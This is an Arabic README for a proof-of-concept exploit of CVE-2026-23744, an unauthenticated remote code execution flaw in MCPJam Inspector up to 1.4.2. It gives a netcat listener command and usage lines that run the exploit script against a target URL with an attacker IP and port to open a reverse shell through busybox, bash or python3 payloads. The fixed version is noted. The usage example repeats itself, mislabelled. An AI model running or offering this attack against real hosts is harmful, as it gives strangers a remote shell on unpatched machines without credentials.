
CVE-2026-23744 — إثبات مفهوم استغلال لثغرة تنفيذ تعليمات برمجية عن بُعد دون مصادقة في MCPJam Inspector <= 1.4.2.
يقوم MCPJam Inspector <= 1.4.2 بالارتباط بـ 0.0.0.0 افتراضيًا ويكشف عن /api/mcp/connect دون أي مصادقة. تقبل نقطة النهاية كائن serverConfig يقوم بتشغيل عملية مباشرة على المضيف — تمرير حمولة reverse shell يمنح تنفيذ أوامر عن بُعد (RCE) فوري دون الحاجة إلى أي بيانات اعتماد.
pip install requests
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
| العلم | الوصف | الافتراضي |
|---|---|---|
-u | عنوان URL الهدف | مطلوب |
-i | عنوان IP الخاص بالمستمع (LHOST) | مطلوب |
-p | منفذ المستمع (LPORT) | مطلوب |
-m | طريقة الحمولة: busybox، bash، python3 | busybox |
الخطوة 1 — ابدأ المستمع:
nc -lvnp 4444
الخطوة 2 — شغّل الاستغلال:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
إذا لم تعمل busybox على الهدف، جرّب الطرق الأخرى:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
| البرنامج | عرضة للثغرة | مُصلَح |
|---|---|---|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |